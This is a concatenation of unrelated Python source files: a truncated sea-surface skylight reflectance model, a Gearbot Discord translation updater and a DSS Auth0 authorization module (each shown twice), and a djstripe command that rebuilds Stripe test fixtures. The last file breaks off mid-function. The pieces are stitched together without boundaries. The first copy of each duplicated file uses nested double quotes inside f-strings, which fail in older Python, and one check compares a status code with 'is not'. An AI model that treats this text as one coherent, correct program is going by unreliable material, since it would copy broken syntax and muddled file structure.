distribution of capillary wave facets sigma = np.sqrt(0.003+0.00512*wind) return sigma def rayleighcdf(x,s): # Cumulative distribution function for Rayleigh distribution t = (x/s)**2 y = 1-np.exp(-t/2) return y # Elementwise broadcasting 1x3(refl) onto 101x3(inc) n = refl - inc vLen = vec_length(n).reshape(vec_length(n)[:].shape[0],1) n = n/vLen # the zenith and azimuth angles of the facets azm_n,zen_n,_ = my_cart2sph(n) # convert facet zenith angle to slopes slope = np.tan(zen_n) # estimate wind-roughned probability of facets # sigma2 = 0.003 + 0.00512*wind; # sigma = sigma2^0.5; sigma = cox_munk(wind) # p1 = normcdf(max(slope),0,sigma) - normcdf(min(slope),0,sigma); # !!! see document On the Cox and Munk sigma = sigma/np.sqrt(2) p1 = rayleighcdf(max(slope),sigma)-rayleighcdf(min(slope),sigma) #} !!! # azimuth angle ranges from -180 to 180. Need to treat the cases when the # azimuth angles cover both positive ang negative ranges. # case 1: -2 -1 1 2 # case 2: -179, -178, 178, 179 # case 3: -179 -120 2 5 130 178 # cases 1 and 2: the range should be 4 # case 3: the range should be 357 azm_nx = max(azm_n) azm_nn = min(azm_n) if azm_nx*azm_nn >0: # not an issue p2 = (azm_nx-azm_nn)/2/π elif any(abs(azm_n)<π/2): # cases 1 and 3 p2 = (azm_nx-azm_nn)/2/π else: # case 2 ind = azm_n<0 azm_n[ind] = azm_n[ind]+2*π azm_nx = max(azm_n) azm_nn = min(azm_n) p2 = (azm_nx-azm_nn)/2/π prob = 2*p1*p2 # factor 2 accounts for 180 degree ambiguity # incident angle # cosw = sum(bsxfun(@times,n,refl),2) cosw = np.sum(n*refl,1) ang = np.arccos(cosw) ind = ang>π/2 ang[ind] = π - ang[ind] ang = np.mean(ang) return prob, ang def sw_fresnel(wv,ang,T,S): """ Calcualtes Fresnel reflectance for seawater. Inputs ------ wv : Wavelength (nm) ang : Reflectance angle T : Temperature (̊ C) S : Salinity (PSU) Outputs ------- m : Refractive index ref : Fresnel reflectance of seawater """ m = index_w(wv,T,S) ref = fresnel(m,ang) return ref def index_w(wv, T, S): """ Calculates water refractive index mw(wv,T,S)=n0+(n1+n2T+n3T^2)S+n4T2+(n5+n6S+n7T)/wv+n8/wv^2+n9/wv^3; Inputs ------- wv : Wavelength (nm) T : Temperature (̊ C) S : Salinity (PPT) """ n0=1.31405 n1=1.779e-4 n2=-1.05e-6 n3=1.6e-8 n4=-2.02e-6 n5=15.868 n6=0.01155 n7=-0.00423 n8=-4382 n9=1.1455e6 n0_4=n0+(n1+n2*T+n3*T**2)*S+n4*T**2 n5_7=n5+n6*S+n7*T wv = np.array(wv, dtype=np.float) mw=n0_4+n5_7*(wv**-1)+n8*(wv**-2)+n9*(wv**-3) return mw def fresnel(m ,ang): """ This function calculates the Fresnel reflectances for electric vector parallel (Rp), perpendicular (Rr) and unpolarized incident light. The reflection matrix = [R11, R12, 0; R12, R11, 0; 0, 0, R33] Only accounts for I, Q, U and ignore the V component. Revision History 2016-07-10: 1st version, just compute R11, i.e, R 2016-12-14: add other reflection matrix elements R12 and R33 Also found an error in the previous equaiton for Rp1 Inputs ------ m : Relative refractive index ang : Reflectance (incident) angle Outputs ------- R : Fresnel reflectance matrix element (1, 1) R12 : Fresnel reflectance matrix element (1, 2) R33 : Fresnel reflectance matrix element (3, 3) """ ang = np.reshape(ang,(-1,1)) m = np.reshape(m,(1,-1)) cosang = abs(np.cos(ang)) # cosine of incident angle sinangr = np.sin(ang)*(1/m) # sine of refraction angle cosangr = (1-sinangr**2)**0.5 # cosine of refraction angle # # reflection coefficient for perpendicular incident light tmp = cosangr*m Rr1 = (cosang - tmp)/(cosang + tmp) # # Rr1=(cosang-m*cosangr)./(cosang+m*cosangr) # # reflection coefficient for parallel incident light tmp = cosang*m # this was previous one # Rp1 = bsxfun(@minus,cosangr,tmp)./bsxfun(@plus,cosangr,tmp) Rp1 = (tmp - cosangr)/(cosangr + tmp) # Rp1=(cosangr-m*cosang)./(cosangr+m*cosang); Rr = np.abs(Rr1)**2 # reflectance for perpendicular incident light Rp = np.abs(Rp1)**2 # reflectance for parallel incident light R = (Rr+Rp)/2 R12 = (Rp-Rr)/2 R33 = np.real(Rr1*np.conj(Rp1)) return [R, R12, R33] def my_interpn(dbArray, coords, dims, interpCoords): ''' Interpolates an n-D array defined by axes/values coords to the points defined in interpCoords Inputs --- dbArray : n-D array of model outputs in the database coords : list of n arrays defining the coordinates in dbArray interpCoords : list of n arrays defining the values at which to interpolate dbArray Outputs --- interpArray : n-D array of dbArray values interpolated to interpCoords ''' da = xr.DataArray(name='dbArray', data=dbArray, dims=dims, coords=coords) interpDict = dict(zip(da.dims, interpCoords)) interpXR = da.interp(**interpDict).squeeze() if len(interpXR.shape) > 1: interpArray = np.swapaxes(interpXR.data, 0, 1) else: interpArray = interpXR.data return interpArray def Main(env, sensor): """ Computes sea surface reflectance of skylight. Based on: Zhang, X., S. He, A. Shabani, P.-W. Zhai, and K. Du. 2017. Spectral sea surface reflectance of skylight. Opt. Express 25: A1-A13, doi:10.1364/OE.25.0000A1. Translated from Matlab by D. Aurin 1/2020 Inputs ------ env : Environmental variables (scalars) C(cloud; not used), od(aerosol optical depth), sal(salinity), wind, wtem(water temp), zen_sun(solar zenith angle) sensor: Sensor configurations ang([zenith angle (scalar), 180-relative solar azimuth angle (scalar)]), wv(list of waveband centers) (vector) Outputs ------- ρ : Spectral sea surface reflectance of sun/sky glint including sun(solar ρ), sky(sky ρ), sca2vec(), ρ(total ρ) """ ρ = collections.OrderedDict() load_db() sensor['ang2'] = sensor['ang'] + np.array([0, 180]) sensor['pol'] = np.deg2rad(sensor['ang']) # the sensor polar coordinate sensor['vec'] = my_sph2cart(sensor['pol'][1], sensor['pol'][0]) # sensor vector sensor['pol2'] = np.deg2rad(sensor['ang2']) # the skylight polar coordinate sensor['loc2'] = find_quads(*sensor['pol2']) # Probability and reflection angle of reflecting skylight into the sensor ''' Optionally stop using loop until the efficiency is addressed by saving and loading the result ''' prob, angr_sky = get_prob(env['wind'], sensor['vec']) # np.save('prob.npy',prob) # np.save('angr_sky.npy',angr_sky) # print('*****************Attention: Using saved values for now*****************') # prob = np.load('prob.npy') # angr_sky = np.load('angr_sky.npy') tprob = np.sum(prob,0) prob = np.reshape(prob, (-1,1)) ref = sw_fresnel(sensor['wv'],angr_sky,env['wtem'],env['sal']) # As currently formulated in Zhang's code, this only captures the # total reflectance (R), and ignores R12 and R33; confirmed w/ Zhang ref = ref[0] print('Interpolating skyrad') wave = db.wv.data.flatten() index = np.arange(1,skyrad0.data.shape[1]+1) aod = db.od.data.flatten() # limit 0 - 0.20 # if env['od'] >0.2: # print(f'AOD = {env["od"]}. Maximum Aerosol Optical Depth Reached. Setting to 0.2') # env['od'] = 0.2 solzen = db.zen_sun.data.flatten() # limit 0 - 60 # if env['zen_sol'] > 60: # print(f'SZA = {env["zen_sol"]}. Maximum solar elevation reached. Setting to 60') # env['zen_sol'] = 60 coords = [wave, index, aod, solzen] dims = ['wave','index','aod','solzen'] interpCoords = [sensor['wv'], index, env['od'], env['zen_sun']] skyrad = my_interpn(skyrad0.data, coords, dims, interpCoords) N0 = skyrad[sensor['loc2'].data] N = skyrad/N0 ρ['sky'] = np.sum((ref * N) * (prob / tprob),0) print('Interpolating sunrad') coords=[wave, aod, solzen] dims=['wave','aod','solzen'] interpCoords = [sensor['wv'], env['od'], env['zen_sun']] sunrad = my_interpn(sunrad0.data, coords, dims, interpCoords) sun_vec = gen_vec_polar(np.deg2rad(env['zen_sun']),quads.sun05.data) prob_sun,angr_sun = prob_reflection(-sun_vec,sensor['vec'],env['wind']) ref_sun = sw_fresnel(sensor['wv'],angr_sun,env['wtem'],env['sal']) ref_sun = ref_sun[0] ρ['sun']=(sunrad/N0)*(ref_sun*prob_sun/tprob) print('Interpolating rad_inc') azimuth = sdb.azm_view.data.flatten() senzen = sdb.zen_view.data.flatten() wave = sdb.wv.data.flatten() solzen = sdb.zen_sun.data.flatten() aod = sdb.od.data[9,:] wind = sdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] dims = ['azimuth','senzen','wave','solzen','aod','wind'] interpCoords_inc = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea') interpCoords_mea = [180-sensor['ang'][1], sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_mea_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_mea) ρ_sca = rad_mea_sca/rad_inc_sca print('Interpolating rad_inc_vec') azimuth = vdb.azm_view.data.flatten() senzen = vdb.zen_view.data.flatten() wave = vdb.wv.data.flatten() solzen = vdb.zen_sun.data.flatten() aod = vdb.od.data[9,:] wind = vdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] interpCoords = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea_vec') rad_mea_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_mea) ρ_vec = rad_mea_vec/rad_inc_vec ρ['sca2vec'] = ρ_vec/ρ_sca ρ['ρ'] = ρ['sky']*ρ['sca2vec'] + ρ['sun'] return ρ
import asyncio import json import os import shutil import threading import zipfile import aiohttp import requests from Util import Configuration, GearbotLogging, Emoji LANGS = dict() BOT = None def on_ready(bot_in): global BOT BOT = bot_in load_translations() def load_translations(): directory = os.fsencode("lang") for file in os.listdir(directory): filename = os.fsdecode(file) if filename.endswith(".json"): with open(f"lang/{filename}", encoding="UTF-8") as lang: LANGS[filename[:-5]] = json.load(lang) def assemble(emoji, key, location, **kwargs): return f"{Emoji.get_chat_emoji(emoji)} {translate(key, location, **kwargs)}" def translate(key, location, **kwargs): lid = None if location is not None: if hasattr(location, "guild"): location = location.guild if location is not None and hasattr(location, "id"): lid = location.id else: lid = location if lid is None: lang_key = "en_US" else: lang_key = Configuration.get_var(lid, "LANG") if key in LANGS[lang_key].keys(): return LANGS[lang_key][key].format(**kwargs) else: if key in LANGS["en_US"].keys(): return LANGS["en_US"][key].format(**kwargs) return key async def update(): message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji("REFRESH")} Updating translations") project_key = Configuration.get_master_var("CROWDIN_KEY") session: aiohttp.ClientSession = BOT.aiosession async with session.get(f"https://api.crowdin.com/api/project/Gearbot/export?key={project_key}&json",) as reply: if reply.status is not 200: await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji("WARNING")} Crowdin api error, got response code {reply.status}") else: response = await reply.json() if response["success"]["status"] == "built": # only update translations if we actually got a new build, should be every time though unless this runs 2x within 30 mins for some reason async with session.get( f"https://api.crowdin.com/api/project/Gearbot/download/all.zip?key={project_key}") as reply: data = await reply.read() with open("zip.zip", "wb") as file: file.write(data) with zipfile.ZipFile("zip.zip", "r") as archive: tempdir = os.path.abspath("temp") if os.path.isdir(tempdir): shutil.rmtree(tempdir, ignore_errors=True) os.mkdir(tempdir) archive.extractall("temp") for entry in archive.filelist: if not entry.filename.endswith(".json"): continue filename =entry.filename[-10:] if os.path.isfile(os.path.abspath(f"lang/{filename}")): os.remove(os.path.abspath(f"lang/{filename}")) archive.extract(entry, tempdir) os.rename(os.path.abspath(f"temp/{entry.filename}"), os.path.abspath(f"lang/{filename}")) shutil.rmtree("temp", ignore_errors=True) load_translations() await message.edit(content=f"{Emoji.get_chat_emoji("YES")} Translations have been updated") else: await message.edit(content=f"{Emoji.get_chat_emoji("WARNING")} Crowdin build status was `{response["success"]["status"]}`, no translation update required") async def upload(): if Configuration.get_master_var("CROWDIN_KEY", None) is None: return message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji("REFRESH")} Uploading translation file") t = threading.Thread(target=upload_file) t.start() while t.is_alive(): await asyncio.sleep(1) await message.edit(content=f"{Emoji.get_chat_emoji("YES")} Translations file has been uploaded") def upload_file(): data = {'files[master/lang/en_US.json]': open('lang/en_US.json', 'r')} project_key = Configuration.get_master_var("CROWDIN_KEY") requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?key={project_key}&json", files=data)
import asyncio import json import os import shutil import threading import zipfile import aiohttp import requests from Util import Configuration, GearbotLogging, Emoji LANGS = dict() BOT = None def on_ready(bot_in): global BOT BOT = bot_in load_translations() def load_translations(): directory = os.fsencode("lang") for file in os.listdir(directory): filename = os.fsdecode(file) if filename.endswith(".json"): with open(f"lang/{filename}", encoding="UTF-8") as lang: LANGS[filename[:-5]] = json.load(lang) def assemble(emoji, key, location, **kwargs): return f"{Emoji.get_chat_emoji(emoji)} {translate(key, location, **kwargs)}" def translate(key, location, **kwargs): lid = None if location is not None: if hasattr(location, "guild"): location = location.guild if location is not None and hasattr(location, "id"): lid = location.id else: lid = location if lid is None: lang_key = "en_US" else: lang_key = Configuration.get_var(lid, "LANG") if key in LANGS[lang_key].keys(): return LANGS[lang_key][key].format(**kwargs) else: if key in LANGS["en_US"].keys(): return LANGS["en_US"][key].format(**kwargs) return key async def update(): message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Updating translations") project_key = Configuration.get_master_var("CROWDIN_KEY") session: aiohttp.ClientSession = BOT.aiosession async with session.get(f"https://api.crowdin.com/api/project/Gearbot/export?key={project_key}&json",) as reply: if reply.status is not 200: await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('WARNING')} Crowdin api error, got response code {reply.status}") else: response = await reply.json() if response["success"]["status"] == "built": # only update translations if we actually got a new build, should be every time though unless this runs 2x within 30 mins for some reason async with session.get( f"https://api.crowdin.com/api/project/Gearbot/download/all.zip?key={project_key}") as reply: data = await reply.read() with open("zip.zip", "wb") as file: file.write(data) with zipfile.ZipFile("zip.zip", "r") as archive: tempdir = os.path.abspath("temp") if os.path.isdir(tempdir): shutil.rmtree(tempdir, ignore_errors=True) os.mkdir(tempdir) archive.extractall("temp") for entry in archive.filelist: if not entry.filename.endswith(".json"): continue filename =entry.filename[-10:] if os.path.isfile(os.path.abspath(f"lang/{filename}")): os.remove(os.path.abspath(f"lang/{filename}")) archive.extract(entry, tempdir) os.rename(os.path.abspath(f"temp/{entry.filename}"), os.path.abspath(f"lang/{filename}")) shutil.rmtree("temp", ignore_errors=True) load_translations() await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations have been updated") else: await message.edit(content=f"{Emoji.get_chat_emoji('WARNING')} Crowdin build status was `{response['success']['status']}`, no translation update required") async def upload(): if Configuration.get_master_var("CROWDIN_KEY", None) is None: return message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Uploading translation file") t = threading.Thread(target=upload_file) t.start() while t.is_alive(): await asyncio.sleep(1) await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded") def upload_file(): data = {'files[master/lang/en_US.json]': open('lang/en_US.json', 'r')} project_key = Configuration.get_master_var("CROWDIN_KEY") requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?key={project_key}&json", files=data)
import requests import os import logging from dss import Config from dss import dynamodb as db from dss.error import DSSForbiddenException, DSSException from .authorize import Authorize, always_allow_admins logger = logging.getLogger(__name__) class FlacMixin(Authorize): """ Mixin class for Auth0 Authorize class to use fine-level access control (FLAC) table to check if a user is allowed to access a given UUID. """ flac_lookup_table_name = f"dss-auth-lookup-{os.environ["DSS_DEPLOYMENT_STAGE"]}" def _assert_authorized_flac(self, **kwargs): """ kwargs contains information from both the original API function call and from the security decorator. Use both to look up this UUID in the FLAC table. """ # uuid = kwargs['uuid'] # method = kwargs['method'] # email = self.token_email # group = self.token_group # Do FLAC lookup here self.assert_required_parameters(kwargs, ["uuid", "method"]) uuid = kwargs.get('uuid') try: flac_attributes = db.get_item(table=self.flac_lookup_table_name, hash_key=uuid) except db.DynamoDBItemNotFound as ex: msg = f'uuid: {uuid} was not found in the flac table' logger.info(msg, ex) return else: try: self.assert_auth0authz_groups_intersects(flac_attributes['groups']) except DSSForbiddenException: # Re-raise the exception with better context msg = f'User: {self.token} does not have sufficient privileges for object: {flac_attributes}' raise DSSForbiddenException(msg) else: return # TODO what about users? should the class be able to handle users and/or groups? class Auth0AuthZGroupsMixin(Authorize): """ Mixin class for Auth0 Authorize class to access groups information added to the JWT by the Auth0 AuthZ extension. These are the groups used to determine FLAC access. (Note: the Auth0 AuthZ extension adds groups, roles, and permissions, but here we just use groups.) """ @classmethod def get_auth0authz_claim(self): oidc_audience = Config.get_audience()[0] return f"{oidc_audience}auth0" @property def auth0authz_groups(self): """Property for the groups added to the JWT by the Auth0 AuthZ plugin""" # First get the portion of the token added by the Auth0 AuthZ extension auth0authz_claim = self.get_auth0authz_claim() self._assert_required_token_parameters([auth0authz_claim]) auth0authz_token = self.token[auth0authz_claim] # Second extract the groups from this portion auth0authz_groups_claim = "groups" self.assert_required_parameters(auth0authz_token, [auth0authz_groups_claim]) groups = self.token[auth0authz_claim][auth0authz_groups_claim] return groups def assert_auth0authz_groups_intersects(self, groups): """ Assert that the intersection of Auth0 AuthZ groups and user-provided groups has cardinality greater than zero (intersection has at least 1 member). """ cardinality = len(set(self.auth0authz_groups).intersection(set(groups))) if cardinality > 0: return else: raise DSSForbiddenException() class Auth0(FlacMixin, Auth0AuthZGroupsMixin): """ Implements the Auth0 security flow, which implements different authorization checks based on whether operations are create/read/update/delete operations. Decorator examples: @security.assert_security(method='create', groups=['dbio', 'grp']) @security.assert_security(method='read') @security.assert_security(method='update', groups=['dbio', 'grp']) @security.assert_security(method='delete') """ def __init__(self): self.session = requests.Session() self.valid_methods = {'group': self._group, 'create': self._create, 'read': self._read, 'update': self._update, 'delete': self._delete} def security_flow(self, **kwargs): """ Dispatch pattern: the assert_security decorator will specify the type of operation (CRUD), which is passed through to the kwargs of this method, and used to call the correct method. """ # TODO add some type of jwt inspection self.assert_required_parameters(kwargs, ['method']) method = kwargs['method'] # Ensure method is valid if method is None or method not in self.valid_methods.keys(): err = f'Unable to locate auth_method {method} for request, valid methods are: ' err += f'{', '.join(self.valid_methods)}' raise DSSException(500, err) # Further kwarg processing should happen from # inside the method that needs the info. # Dispatch to correct method executed_method = self.valid_methods[method] executed_method(**kwargs) @always_allow_admins def _group(self, **kwargs): """Auth checks for 'group' API actions""" # This just checks that the JWT group is in the # list of allowed groups specified in the decorator self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _create(self, **kwargs): """Auth checks for 'create' API actions""" # Only check that the token group is in the security decorator's list of allowed groups self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _read(self, **kwargs): """Auth checks for 'read' API actions""" # Data is public if there is no FLAC table entry. self._assert_authorized_flac(**kwargs) return @always_allow_admins def _update(self, **kwargs): """Auth checks for 'update' API actions""" # Update requires read and create access # Assert user has read access read_kwargs = kwargs.copy() read_kwargs['method'] = 'read' self._read(**read_kwargs) # Assert user has create access create_kwargs = kwargs.copy() create_kwargs['method'] = 'create' self.assert_required_parameters(create_kwargs, ['groups']) self._create(**create_kwargs) return @always_allow_admins def _delete(self, **kwargs): """Auth checks for 'delete' API actions""" err = f"Delete action is only allowed for admin users, user: {self.token_email} is not permitted" raise DSSForbiddenException(err)
import requests import os import logging from dss import Config from dss import dynamodb as db from dss.error import DSSForbiddenException, DSSException from .authorize import Authorize, always_allow_admins logger = logging.getLogger(__name__) class FlacMixin(Authorize): """ Mixin class for Auth0 Authorize class to use fine-level access control (FLAC) table to check if a user is allowed to access a given UUID. """ flac_lookup_table_name = f"dss-auth-lookup-{os.environ['DSS_DEPLOYMENT_STAGE']}" def _assert_authorized_flac(self, **kwargs): """ kwargs contains information from both the original API function call and from the security decorator. Use both to look up this UUID in the FLAC table. """ # uuid = kwargs['uuid'] # method = kwargs['method'] # email = self.token_email # group = self.token_group # Do FLAC lookup here self.assert_required_parameters(kwargs, ["uuid", "method"]) uuid = kwargs.get('uuid') try: flac_attributes = db.get_item(table=self.flac_lookup_table_name, hash_key=uuid) except db.DynamoDBItemNotFound as ex: msg = f'uuid: {uuid} was not found in the flac table' logger.info(msg, ex) return else: try: self.assert_auth0authz_groups_intersects(flac_attributes['groups']) except DSSForbiddenException: # Re-raise the exception with better context msg = f'User: {self.token} does not have sufficient privileges for object: {flac_attributes}' raise DSSForbiddenException(msg) else: return # TODO what about users? should the class be able to handle users and/or groups? class Auth0AuthZGroupsMixin(Authorize): """ Mixin class for Auth0 Authorize class to access groups information added to the JWT by the Auth0 AuthZ extension. These are the groups used to determine FLAC access. (Note: the Auth0 AuthZ extension adds groups, roles, and permissions, but here we just use groups.) """ @classmethod def get_auth0authz_claim(self): oidc_audience = Config.get_audience()[0] return f"{oidc_audience}auth0" @property def auth0authz_groups(self): """Property for the groups added to the JWT by the Auth0 AuthZ plugin""" # First get the portion of the token added by the Auth0 AuthZ extension auth0authz_claim = self.get_auth0authz_claim() self._assert_required_token_parameters([auth0authz_claim]) auth0authz_token = self.token[auth0authz_claim] # Second extract the groups from this portion auth0authz_groups_claim = "groups" self.assert_required_parameters(auth0authz_token, [auth0authz_groups_claim]) groups = self.token[auth0authz_claim][auth0authz_groups_claim] return groups def assert_auth0authz_groups_intersects(self, groups): """ Assert that the intersection of Auth0 AuthZ groups and user-provided groups has cardinality greater than zero (intersection has at least 1 member). """ cardinality = len(set(self.auth0authz_groups).intersection(set(groups))) if cardinality > 0: return else: raise DSSForbiddenException() class Auth0(FlacMixin, Auth0AuthZGroupsMixin): """ Implements the Auth0 security flow, which implements different authorization checks based on whether operations are create/read/update/delete operations. Decorator examples: @security.assert_security(method='create', groups=['dbio', 'grp']) @security.assert_security(method='read') @security.assert_security(method='update', groups=['dbio', 'grp']) @security.assert_security(method='delete') """ def __init__(self): self.session = requests.Session() self.valid_methods = {'group': self._group, 'create': self._create, 'read': self._read, 'update': self._update, 'delete': self._delete} def security_flow(self, **kwargs): """ Dispatch pattern: the assert_security decorator will specify the type of operation (CRUD), which is passed through to the kwargs of this method, and used to call the correct method. """ # TODO add some type of jwt inspection self.assert_required_parameters(kwargs, ['method']) method = kwargs['method'] # Ensure method is valid if method is None or method not in self.valid_methods.keys(): err = f'Unable to locate auth_method {method} for request, valid methods are: ' err += f'{", ".join(self.valid_methods)}' raise DSSException(500, err) # Further kwarg processing should happen from # inside the method that needs the info. # Dispatch to correct method executed_method = self.valid_methods[method] executed_method(**kwargs) @always_allow_admins def _group(self, **kwargs): """Auth checks for 'group' API actions""" # This just checks that the JWT group is in the # list of allowed groups specified in the decorator self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _create(self, **kwargs): """Auth checks for 'create' API actions""" # Only check that the token group is in the security decorator's list of allowed groups self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _read(self, **kwargs): """Auth checks for 'read' API actions""" # Data is public if there is no FLAC table entry. self._assert_authorized_flac(**kwargs) return @always_allow_admins def _update(self, **kwargs): """Auth checks for 'update' API actions""" # Update requires read and create access # Assert user has read access read_kwargs = kwargs.copy() read_kwargs['method'] = 'read' self._read(**read_kwargs) # Assert user has create access create_kwargs = kwargs.copy() create_kwargs['method'] = 'create' self.assert_required_parameters(create_kwargs, ['groups']) self._create(**create_kwargs) return @always_allow_admins def _delete(self, **kwargs): """Auth checks for 'delete' API actions""" err = f"Delete action is only allowed for admin users, user: {self.token_email} is not permitted" raise DSSForbiddenException(err)
import json from copy import deepcopy from typing import Dict, List, Set, Type import stripe.api_resources import stripe.stripe_object import tests from django.core.management import BaseCommand from stripe.error import InvalidRequestError import djstripe.models import djstripe.settings """ Key used to store fake ids in the real stripe object's metadata dict """ FAKE_ID_METADATA_KEY = "djstripe_test_fake_id" class Command(BaseCommand): """ This does the following: 1) Load existing fixtures from JSON files 2) Attempts to read the corresponding objects from Stripe 3) If found, for types Stripe doesn't allow us to choose ids for, we build a map between the fake ids in the fixtures and real Stripe ids 3) If not found, creates objects in Stripe from the fixtures 4) Save objects back as fixtures, using fake ids if available The rationale for this is so that the fixtures can automatically be updated with Stripe schema changes running this command. This should make keeping our tests and model schema compatible with Stripe schema changes less pain-staking and simplify the process of upgrading the targeted Stripe API version. """ help = "Command to update test fixtures using a real Stripe account." fake_data_map = {} # type: Dict[Type[djstripe.models.StripeModel], List] fake_id_map = {} # type: Dict[str, str] def add_arguments(self, parser): parser.add_argument( "--delete-stale", action="store_true", help="Delete any untouched fixtures in the directory", ) parser.add_argument( "--update-sideeffect-fields", action="store_true", help="Don't preserve sideeffect fields such as 'created'", ) def handle(self, *args, **options): do_delete_stale_fixtures = options["delete_stale"] do_preserve_sideeffect_fields = not options["update_sideeffect_fields"] common_readonly_fields = ["object", "created", "updated", "livemode"] common_sideeffect_fields = ["created"] # TODO - is it be possible to get a list of which fields are writable from # the API? maybe using https://github.com/stripe/openapi ? # (though that's only for current version) """ Fields that we treat as read-only. Most of these will cause an error if sent to the Stripe API. """ model_extra_readonly_fields = { djstripe.models.Account: ["id"], djstripe.models.Customer: [ "account_balance", "currency", "default_source", "delinquent", "invoice_prefix", "subscriptions", "sources", ], djstripe.models.BankAccount: [ "id", "bank_name", "customer", "last4", "fingerprint", "status", ], djstripe.models.Card: [ "id", "address_line1_check", "address_zip_check", "brand", "country", "customer", "cvc_check", "dynamic_last4", "exp_month", "exp_year", "fingerprint", "funding", "last4", "tokenization_method", ], djstripe.models.PaymentIntent: ["id"], djstripe.models.PaymentMethod: ["id"], djstripe.models.Source: [ "id", "amount", "card", "client_secret", "currency", "customer", "flow", "owner", "statement_descriptor", "status", "type", "usage", ], djstripe.models.Subscription: [ "id", # not actually read-only "billing_cycle_anchor", # seem that this is replacing "billing"? (but they can't both be set) "collection_method", "current_period_end", "current_period_start", "latest_invoice", "start", "start_date", "status", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] """ Fields that we don't care about the value of, and that preserving allows us to avoid churn in the fixtures """ model_sideeffect_fields = { djstripe.models.BalanceTransaction: ["available_on"], djstripe.models.Source: ["client_secret"], djstripe.models.Charge: ["receipt_url"], djstripe.models.Subscription: [ "billing_cycle_anchor", "current_period_start", "current_period_end", "start", "start_date", ], djstripe.models.SubscriptionItem: [ # we don't currently track separate fixtures for SubscriptionItems "id" ], djstripe.models.Product: ["updated"], djstripe.models.Invoice: [ "date", "finalized_at", "hosted_invoice_url", "invoice_pdf", "webhooks_delivered_at", "period_start", "period_end", # we don't currently track separate fixtures for SubscriptionItems "subscription_item", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] object_sideeffect_fields = { model.stripe_class.OBJECT_NAME: set(v) for model, v in model_sideeffect_fields.items() } # type: Dict[str, Set[str]] self.fake_data_map = { # djstripe.models.Account: [tests.FAKE_ACCOUNT], djstripe.models.Customer: [ tests.FAKE_CUSTOMER, tests.FAKE_CUSTOMER_II, tests.FAKE_CUSTOMER_III, tests.FAKE_CUSTOMER_IV, ], djstripe.models.BankAccount: [tests.FAKE_BANK_ACCOUNT_SOURCE], djstripe.models.Card: [ tests.FAKE_CARD, tests.FAKE_CARD_II, tests.FAKE_CARD_V, ], djstripe.models.Source: [tests.FAKE_SOURCE], djstripe.models.Product: [tests.FAKE_PRODUCT], djstripe.models.Plan: [tests.FAKE_PLAN, tests.FAKE_PLAN_II], djstripe.models.Subscription: [ tests.FAKE_SUBSCRIPTION, tests.FAKE_SUBSCRIPTION_II, tests.FAKE_SUBSCRIPTION_III, tests.FAKE_SUBSCRIPTION_MULTI_PLAN, ], djstripe.models.Invoice: [tests.FAKE_INVOICE], djstripe.models.Charge: [tests.FAKE_CHARGE], djstripe.models.PaymentIntent: [tests.FAKE_PAYMENT_INTENT_I], djstripe.models.PaymentMethod: [tests.FAKE_PAYMENT_METHOD_I], djstripe.models.BalanceTransaction: [tests.FAKE_BALANCE_TRANSACTION], } self.init_fake_id_map() objs = [] # Regenerate each of the fixture objects via Stripe # We re-fetch objects in a second pass if they were created during # the first pass, to ensure nested objects are up to date # (eg Customer.subscriptions), for n in range(2): any_created = False self.stdout.write(f"Updating fixture objects, pass {n}") # reset the objects list since we don't want to keep those from # the first pass objs.clear() for model_class, old_objs in self.fake_data_map.items(): readonly_fields = ( common_readonly_fields + model_extra_readonly_fields.get(model_class, []) ) for old_obj in old_objs: created, obj = self.update_fixture_obj( old_obj=deepcopy(old_obj), model_class=model_class, readonly_fields=readonly_fields, do_preserve_sideeffect_fields=do_preserve_sideeffect_fields, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) objs.append(obj) any_created = created or any_created if not any_created: # nothing created on this pass, no need to continue break else: self.stderr.write( "Warning, unexpected behaviour - some fixtures still being created " "in second pass?" ) # Now the fake_id_map should be complete and the objs should be up to date, # save all the fixtures paths = set() for obj in objs: path = self.save_fixture(obj) paths.add(path) if do_delete_stale_fixtures: for path in tests.FIXTURE_DIR_PATH.glob("*.json"): if path in paths: continue else: self.stdout.write("deleting {}".format(path)) path.unlink() def init_fake_id_map(self): """ Build a mapping between fake ids stored in Stripe metadata and those obj's actual ids We do this so we can have fixtures with stable ids for objects Stripe doesn't allow us to specify an id for (eg Card). Fixtures and tests will use the fake ids, when we talk to stripe we use the real ids :return: """ for fake_customer in self.fake_data_map[djstripe.models.Customer]: try: # can only access Cards via the customer customer = djstripe.models.Customer( id=fake_customer["id"] ).api_retrieve() except InvalidRequestError: self.stdout.write( f"Fake customer {fake_customer["id"]} doesn't exist in Stripe yet" ) return # assume that test customers don't have more than 100 cards... for card in customer.sources.list(limit=100): self.update_fake_id_map(card) 